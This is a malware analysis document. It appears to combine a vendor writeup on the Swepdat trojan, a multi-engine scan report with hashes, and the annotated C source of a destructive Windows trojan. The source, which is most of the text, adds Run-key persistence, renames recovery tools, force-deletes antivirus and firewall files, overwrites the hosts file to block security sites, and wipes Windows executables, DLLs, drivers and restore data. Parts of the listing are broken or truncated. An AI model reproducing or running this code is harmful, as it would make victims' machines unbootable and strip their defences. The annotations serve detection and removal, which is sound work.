Swepdat
Risk Level 1: Very Low
SUMMARY
TECHNICAL DETAILS
REMOVAL
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System
(Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows
XP).
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe to
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_
C:\WINDOWS\regedit.exe to C:\WINDOWS\regedit.ex_
C:\WINDOWS\system32\Restorerstrui\rstrui.exe to
C:\WINDOWS\system32\Restorerstrui\rstrui.ex_
C:\WINDOWS\system32\wscui.cpl to C:\WINDOWS\system32\wscui.cp_
C:\WINDOWS\system32\wupdmgr.exe to C:\WINDOWS\system32\wupdagr.ex_
C:\WINDOWS\system32\taskmgr.exe to C:\WINDOWS\system32\taskdae.ex_
4. Attempts to delete the following security-related files from the specified program folders and all of their
subfolders:
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
C:\Program Files\McAfee.com\VSO\Dat\4615\*.*
C:\Program Files\McAfee.com\*.*
C:\Program Files\Norton AntiVirus\*.dll
C:\Program Files\Common Files\Symantec Shared\*.exe
C:\Program Files\Norton AntiVirus\*.ini
C:\Program Files\Norton AntiVirus\*.exe
C:\Program Files\Norton AntiVirus\*.inf
C:\Program Files\Zone Labs\ZoneAlarm\*.exe
C:\Program Files\Zone Labs\ZoneAlarm\*.zap
C:\Program Files\Zone Labs\ZoneAlarm\*.dll
C:\Program Files\Zone Labs\ZoneAlarm\repair\*.dll
C:\Program Files\Kaspersky Lab\AVP6\*.exe
C:\Program Files\Kaspersky Lab\AVP6\*.dll
5. Adds the following lines to the hosts file to block access to specific Web sites:
0.0.0.0 google.com
0.0.0.0 www.hotmail.com
0.0.0.0 www.microsoft.com
0.0.0.0 microsoft.com
0.0.0.0 macafee.com
0.0.0.0 www.macafee.com
0.0.0.0 download.mcafee.com
0.0.0.0 www.download.mcafee.com
0.0.0.0 rads.mcafee.com
0.0.0.0 us.mcafee.com
0.0.0.0 www.networkassociates.com
0.0.0.0 networkassociates.com
0.0.0.0 update.symantec.com
0.0.0.0 updates.symantec.com
0.0.0.0 iveupdate.symantec.com
0.0.0.0 norton.com
0.0.0.0 www.symantec.com
0.0.0.0 symantec.com
0.0.0.0 www.norton.com
0.0.0.0 google.com
0.0.0.0 bitdefender.com
0.0.0.0 www.viruslist.com
0.0.0.0 viruslist.com
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com
0.0.0.0 www.kaspersky.com
0.0.0.0 kaspersky.com
0.0.0.0 kaspersky-labs.com
0.0.0.0 www.kaspersky-labs.com
0.0.0.0 www.trendmicro.com
0.0.0.0 trendmicro.com
0.0.0.0 www.pandasoftware.com
0.0.0.0 pandasoftware.com
0.0.0.0 www.nod32.com
0.0.0.0 nod32.com
0.0.0.0 yahoo.com
0.0.0.0 mail.yahoo.com
0.0.0.0 www.grisoft.com
0.0.0.0 www.f-secure.com
0.0.0.0 f-secure.com
Title: Error
Message: Access Violation at address: 0050666F
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
8. Creates the file C:\windows\system32\exploit.html which is a malicious HTML file that causes a Denial
of Service if opened.
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
File 74014b1000255b1f306e0088a10738001789c1d3.EXE received on 2009.05.23 13:15:04 (UTC)
Antivirus Version Last Update Result
AhnLab-V3 5.0.0.2 2009.05.23 -
AntiVir 7.9.0.168 2009.05.23 TR/Qhost.EY
Antiy-AVL 2.0.3.1 2009.05.22 Trojan/Win32.Qhost
Authentium 5.1.2.4 2009.05.22 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.22 Win32:KillWin-S
AVG 8.5.0.339 2009.05.23 Generic.MAY
BitDefender 7.2 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
CAT-QuickHeal 10.00 2009.05.23 Trojan.Qhost.ey
ClamAV 0.94.1 2009.05.22 Trojan.Rorren
Comodo 1157 2009.05.08 TrojWare.Win32.Qhosts.EY
DrWeb 5.0.0.12182 2009.05.23 Trojan.KillFiles.472
eSafe 7.0.17.0 2009.05.21 Win32.Qhost.ey
eTrust-Vet 31.6.6519 2009.05.23 -
F-Prot 4.4.4.56 2009.05.22 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.23 Trojan.Win32.Qhost.ey
Fortinet 3.117.0.0 2009.05.23 W32/Qhost.EY!tr
GData 19 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
Ikarus T3.1.1.49.0 2009.05.23 Trojan.Win32.Qhost
K7AntiVirus 7.10.741 2009.05.21 Trojan.Win32.Qhost.ey
Kaspersky 7.0.0.125 2009.05.23 Trojan.Win32.Qhost.ey
McAfee 5623 2009.05.22 Zap-337
McAfee+Artemis 5623 2009.05.22 Zap-337
McAfee-GW-Edition 6.7.6 2009.05.23 Trojan.Qhost.EY
Microsoft 1.4701 2009.05.23 TrojanDropper:Win32/Logsnif
NOD32 4098 2009.05.22 Win32/Qhosts.EY
Norman 2009.05.22 W32/Qhost.BZ
nProtect 2009.1.8.0 2009.05.23 Trojan/W32.Qhost.12288.D
PCTools 4.4.2.0 2009.05.21 Trojan.Qhosts
Prevx 3.0 2009.05.23 -
Rising 21.30.52.00 2009.05.23 Trojan.Qhost.eq
Sophos 4.42.0 2009.05.23 Troj/Killfile-F
Sunbelt 3.2.1858.2 2009.05.23 Trojan.Swepdat
Symantec 1.4.4.12 2009.05.23 Trojan.Swepdat
TheHacker 6.3.4.3.331 2009.05.22 Trojan/Qhost.ey
TrendMicro 8.950.0.1092 2009.05.23 -
VBA32 3.12.10.5 2009.05.23 Trojan.Win32.Qhost.ey
ViRobot 2009.5.23.1749 2009.05.23 -
VirusBuster 4.6.5.0 2009.05.22 Trojan.Qhost.RW
Additional information
File size: 12288 bytes
MD5 : 35b259a4d83e4d59be351c396fd6b95a
SHA1 : e20d0a5f2600162b76a2c89e3a101ce7240fcff8
SHA256: 631cb88ed8edacc15ff90dea81ff661adc628d17919e6c138f6c867d5c46035b
W32.MaTriX@mm.cpp
/*
made by ceoby
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <mmsystem.h>
/*
 * hideprocess — analysis annotation.
 * Runs 24 sweeps, 100 ms apart, that look up top-level windows by their
 * title bar text and send them WM_CLOSE: Task Manager, Registry Editor,
 * msconfig ("System Configuration Utility") and the Windows File
 * Protection dialog.  To the user this appears as those tools closing on
 * their own shortly after being opened, which is one of the observable
 * symptoms listed in the writeup.  When a window is not found FindWindow
 * returns NULL and the SendMessage call is expected to fail harmlessly.
 * NOTE(extraction): the listing breaks off here — neither the for-loop nor
 * the function is closed in this copy; the text that follows is file-scope
 * declarations.
 */
void hideprocess()
{
int i;
for(i = 1; i < 25; i++)
{
HWND program;
Sleep (100);   /* 100 ms per sweep, roughly 2.4 s for all 24 */
program = FindWindow(0, "Windows Task Manager");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);   /* cast types are swapped (WPARAM/LPARAM) but both values are 0 */
program = FindWindow(0, "Registry Editor");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
program = FindWindow(0, "System Configuration Utility");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
program = FindWindow(0, "Windows File Protection");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
/* File-scope state shared by the installer routines below. */
char Wn[MAX_PATH];      /* install target: <system dir>\WUpdates.exe, filled in by fPaths() */
char Mn[MAX_PATH];      /* path of the running executable, filled in by fPaths() */
SOCKET sock;            /* not referenced anywhere in the visible listing */
HWND Wnd;               /* not referenced anywhere in the visible listing */
char Buffer [1230];     /* not referenced anywhere in the visible listing */
int x,y;                /* not referenced anywhere in the visible listing */
/*
 * Hkey — persistence.
 * Copies the running executable to <system dir>\WUpdates.exe and registers
 * that path under HKLM\Software\Microsoft\Windows\CurrentVersion\Run as the
 * value "WUpdates", so the copy is started again at each logon.  The dropped
 * file name and the Run value name are the stable indicators to look for
 * during removal.  Declared int but never returns a value.
 * (The function continues past a page-header artifact in this copy.)
 */
int Hkey()
{
char system[MAX_PATH];    /* NOTE: this local shadows the C library function system() inside Hkey */
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);                     /* module handle of the running image */
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));   /* full path of this executable */
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\WUpdates.exe");                             /* unbounded append; relies on MAX_PATH headroom */
CopyFile(pathtofile,system,FALSE);                           /* FALSE: overwrite an existing copy */
HKEY hKey;
/* Continuation of Hkey(): the Run-key registration.  The function's opening is above. */
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_SET_VALUE,&hKey );   /* needs write access to HKLM, i.e. an administrative user */
RegSetValueEx(hKey, "WUpdates",0,REG_SZ,(const unsigned char*)system,sizeof(system));   /* stores the whole MAX_PATH buffer, not just the string up to its NUL */
RegCloseKey(hKey);
}
/*
 * fPaths — fills the file-scope buffers used by inst():
 *   Wn = <system dir>\WUpdates.exe   (install target)
 *   Mn = path of the running executable
 * Not called from the visible tail of the program; see inst().
 */
void fPaths()
{
GetSystemDirectory(Wn, sizeof(Wn));
GetModuleFileName(0, Mn, sizeof(Mn));   /* 0 = the calling process's own image */
strcat(Wn, "\\WUpdates.exe");           /* unbounded append into the MAX_PATH buffer */
}
/*
 * inst — a second installer variant alongside Hkey().
 * Copies the running executable to Wn (set by fPaths), attempts three more
 * CopyFile calls for WUpdates.exe, MicroSuck.exe and Svchost32.exe, and adds
 * the Run value "Windows Security Updates" pointing at Wn.  The three extra
 * file names are indicators worth checking for, though nothing in the visible
 * listing creates MicroSuck.exe or Svchost32.exe.  Neither fPaths() nor
 * inst() is invoked from the visible tail of the program; the tail calls
 * Hkey() instead.
 */
void inst()
{
CopyFile(Mn,Wn,0);   /* 0: overwrite an existing file */
CopyFile ("WUpdates.exe", "C:\\windows",TRUE);            /* TRUE: do not overwrite */
CopyFile ("MicroSuck.exe", "C:\\windows\\system",TRUE);
CopyFile ("Svchost32.exe", "C:\\windows\\system32",TRUE);
HKEY inst;   /* NOTE: shadows the function name inside its own body */
RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &inst);
RegSetValueEx(inst, "Windows Security Updates", 0, REG_SZ, (LPBYTE)Wn, sizeof(Wn));   /* stores the whole MAX_PATH buffer */
RegCloseKey(inst);
}
/*
 * BlockSite — hosts-file tampering (item 5 of the writeup).
 * Opens the system hosts file in "w" mode, which truncates whatever was
 * there, and writes 0.0.0.0 mappings for search, webmail, Microsoft and
 * antivirus-vendor domains so updates and vendor sites cannot be reached.
 * No "\n" is ever written: every entry after the first is prefixed with a
 * single space, so the whole file ends up as one line.  Whether the Windows
 * resolver honours entries beyond the first pair on such a line is not
 * settled by this listing; the writeup lists them as if they were separate
 * lines.  Remediation is to restore the hosts file to its default content.
 * Note the misspelled "macafee.com" entries, which appear verbatim in the
 * writeup and are a convenient signature.
 * NOTE(extraction): the listing breaks off before the remaining entries
 * (trendmicro, pandasoftware, nod32, yahoo, grisoft, f-secure in the
 * writeup), the fclose and the closing brace of this function.
 */
void BlockSite()
{
FILE *fpl;
fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w");   /* "w" discards the existing hosts file; return value unchecked */
fprintf (fpl,"0.0.0.0 google.com");
fprintf (fpl," 0.0.0.0 www.hotmail.com");
fprintf (fpl," 0.0.0.0 www.microsoft.com");
fprintf (fpl," 0.0.0.0 microsoft.com");
fprintf (fpl," 0.0.0.0 macafee.com");
fprintf (fpl," 0.0.0.0 www.macafee.com");
fprintf (fpl," 0.0.0.0 download.mcafee.com");
fprintf (fpl," 0.0.0.0 www.download.mcafee.com");
fprintf (fpl," 0.0.0.0 rads.mcafee.com");
fprintf (fpl," 0.0.0.0 us.mcafee.com");
fprintf (fpl," 0.0.0.0 www.networkassociates.com");
fprintf (fpl," 0.0.0.0 networkassociates.com");
fprintf (fpl," 0.0.0.0 update.symantec.com");
fprintf (fpl," 0.0.0.0 updates.symantec.com");
fprintf (fpl," 0.0.0.0 iveupdate.symantec.com");
fprintf (fpl," 0.0.0.0 norton.com");
fprintf (fpl," 0.0.0.0 www.symantec.com");
fprintf (fpl," 0.0.0.0 symantec.com");
fprintf (fpl," 0.0.0.0 www.norton.com");
fprintf (fpl," 0.0.0.0 google.com");   /* duplicate of the first entry */
fprintf (fpl," 0.0.0.0 bitdefender.com");
fprintf (fpl," 0.0.0.0 www.viruslist.com");
fprintf (fpl," 0.0.0.0 viruslist.com");
fprintf (fpl," 0.0.0.0 www.virustotal.com");
fprintf (fpl," 0.0.0.0 virustotal.com");
fprintf (fpl," 0.0.0.0 www.kaspersky.com");
fprintf (fpl," 0.0.0.0 kaspersky.com");
fprintf (fpl," 0.0.0.0 kaspersky-labs.com");
fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com");
/*
 * DelWin — destructive payload.
 * Shells out to cmd.exe eight times with "del /F /S /Q" (force read-only,
 * recurse into subdirectories, no prompt) against the executables, DLLs,
 * System Restore data and kernel drivers under C:\WINDOWS.  If it succeeds
 * the machine will not boot again; this is the reason the sample is
 * classified as a KillFiles/KillWin trojan by several engines in the scan
 * table above.  From a monitoring standpoint the visible artefact is a
 * burst of cmd.exe children spawned by the dropper, each with a "del ...
 * /F /S /Q" command line.
 */
void DelWin()
{
system("del C:\\WINDOWS\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\System\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System32\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\System32\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System32\\Restore\\*.* /F /S /Q");   /* removes System Restore data, defeating rollback */
system("del C:\\WINDOWS\\System32\\DRIVERS\\*.sys /F /S /Q");
}
/*
 * spaceup — writes filler text to <system32>\WUpdates.txt.
 * The name suggests the intent was to consume disk space, but the stray
 * ";" after the for header makes the loop body empty: the loop counts
 * from 1 to 99 doing nothing, and the braced block below it then runs
 * exactly once, producing a few hundred bytes of pseudo-hex text with
 * three 100 ms pauses.  The file is never closed here.  WUpdates.txt is
 * a harmless but distinctive artefact for removal.  Not called from the
 * visible tail of the program.
 */
void spaceup()
{
char i;
FILE *Uknown;
Uknown = fopen ("C:\\WINDOWS\\System32\\WUpdates.txt","w");   /* return value unchecked */
for (i=1;i<100;i++);   /* empty loop: the ';' ends the statement */
{                      /* plain compound statement, executed once */
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x00C0000,Bx0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x00000F0,0x0000000,7x0000000,0x00FF000,Ax0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x000E000,0x0000000");
fprintf(Uknown,"0x0000000,0D0000000,Bx0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Nx0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"Ax0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax000F000,0x00CCC00,0x0000C00,0xFFF0000");
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"3x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
}
}
/*
 * Exploit — drops C:\windows\system32\exploit.html (item 8 of the writeup).
 * Despite the name this is not an exploit: the page contains a JavaScript
 * function that calls itself without bound plus an onerror handler that
 * reloads the page, so a browser that opens it hangs or loops.  Nothing in
 * the visible listing opens the file; it is only left on disk.  The stream
 * is never closed.  (The function continues past a page-header artifact
 * in this copy.)
 */
void Exploit()
{
FILE *ghp;
ghp = fopen ("C:\\windows\\system32\\exploit.html","w");   /* return value unchecked */
fprintf(ghp, "<html>");
/* Continuation of Exploit(): the script body of the dropped page.  The function's opening is above. */
fprintf(ghp, "<script>");
fprintf(ghp, "window.onerror=new Function(history.go(0));");   /* any script error reloads the page */
fprintf(ghp, "function btf(){btf();}");                        /* unbounded self-recursion */
fprintf(ghp, "btf();");
fprintf(ghp, "</script>");
fprintf(ghp, "</html>");
}   /* ghp is never fclose'd */
/*
 * Anticlean — disables recovery tools by renaming them (the rename list in
 * the writeup's technical details), then shows a fake "Access Violation"
 * error box, which is the "Title: Error / Message: Access Violation at
 * address: 0050666F" dialog the writeup describes.
 * The for statement has no braces, so only the first rename (msconfig.exe)
 * is repeated ~10 million times; everything from the first Sleep onward
 * runs once.  The "Restorerstrui" path is a typo carried over into the
 * writeup; the real rstrui.exe lives under system32\Restore.  Renamed
 * *.ex_ / *.cp_ files in these locations are the indicators to restore.
 */
void Anticlean()
{
int i;
for(i = 1; i < 9999999; i++)   /* no braces: only the next statement is the loop body */
rename("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe",
"C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.ex_");
Sleep (100);
rename("C:\\WINDOWS\\regedit.exe","C:\\WINDOWS\\regedit.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.exe",
"C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.ex_");   /* path as written does not exist on a stock install */
Sleep (100);
rename("C:\\WINDOWS\\system32\\wscui.cpl","C:\\WINDOWS\\system32\\wscui.cp_");   /* Security Center control panel */
Sleep (100);
rename("C:\\WINDOWS\\system32\\wupdmgr.exe","C:\\WINDOWS\\system32\\wupdagr.ex_");   /* Windows Update launcher */
Sleep (100);
rename("C:\\WINDOWS\\system32\\taskmgr.exe","C:\\WINDOWS\\system32\\taskdae.ex_");
Sleep (100);
MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );   /* decoy error dialog */
}
/*
 * killavfw — attempts to delete installed antivirus and firewall products
 * (item 4 of the writeup): McAfee Personal Firewall and VirusScan Online,
 * Norton AntiVirus and the shared Symantec components, ZoneAlarm and
 * Kaspersky AVP6.  Each line spawns cmd.exe with "del /F /S /Q", so the
 * observable trace is again a burst of cmd.exe children from the dropper.
 * Combined with BlockSite() this is meant to prevent both detection and
 * the vendor updates that would bring detection back.
 */
void killavfw()
{
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q ");   /* a specific DAT version folder, dating the sample */
system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q");
system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q ");
}
/*
 * Tail of the program's entry point.  NOTE(extraction): the function header
 * and the declaration of wndstealth are not in this copy of the listing.
 * Order of operations, which is the order an analyst should expect the
 * artefacts to appear: hide the console window, install persistence
 * (Hkey), rename recovery tools (Anticlean), delete security products
 * (killavfw), overwrite the hosts file (BlockSite), close management
 * windows (hideprocess), drop exploit.html (Exploit), wipe Windows
 * binaries (DelWin), then leave a fake crash-dump file.  spaceup(),
 * fPaths() and inst() are never called from here.
 */
wndstealth=FindWindowA("ConsoleWindowClass",NULL);   /* this process's own console window */
ShowWindow(wndstealth,0);                             /* 0 = SW_HIDE */
Hkey();
Anticlean();
killavfw();
BlockSite();
hideprocess();
Exploit();
DelWin();
FILE *fp;
fp = fopen ("c:\\NError.dmp","w");   /* decoy "crash dump" in the drive root; return value unchecked */
{   /* plain compound statement, not tied to any condition */
fprintf(fp,"%s","Stop: 0x0000000A (0xFFFFFFFC,0x00000002,0x00000000,0x804DC42A)");   /* fake IRQL_NOT_LESS_OR_EQUAL stop text */
fclose(fp);
}
}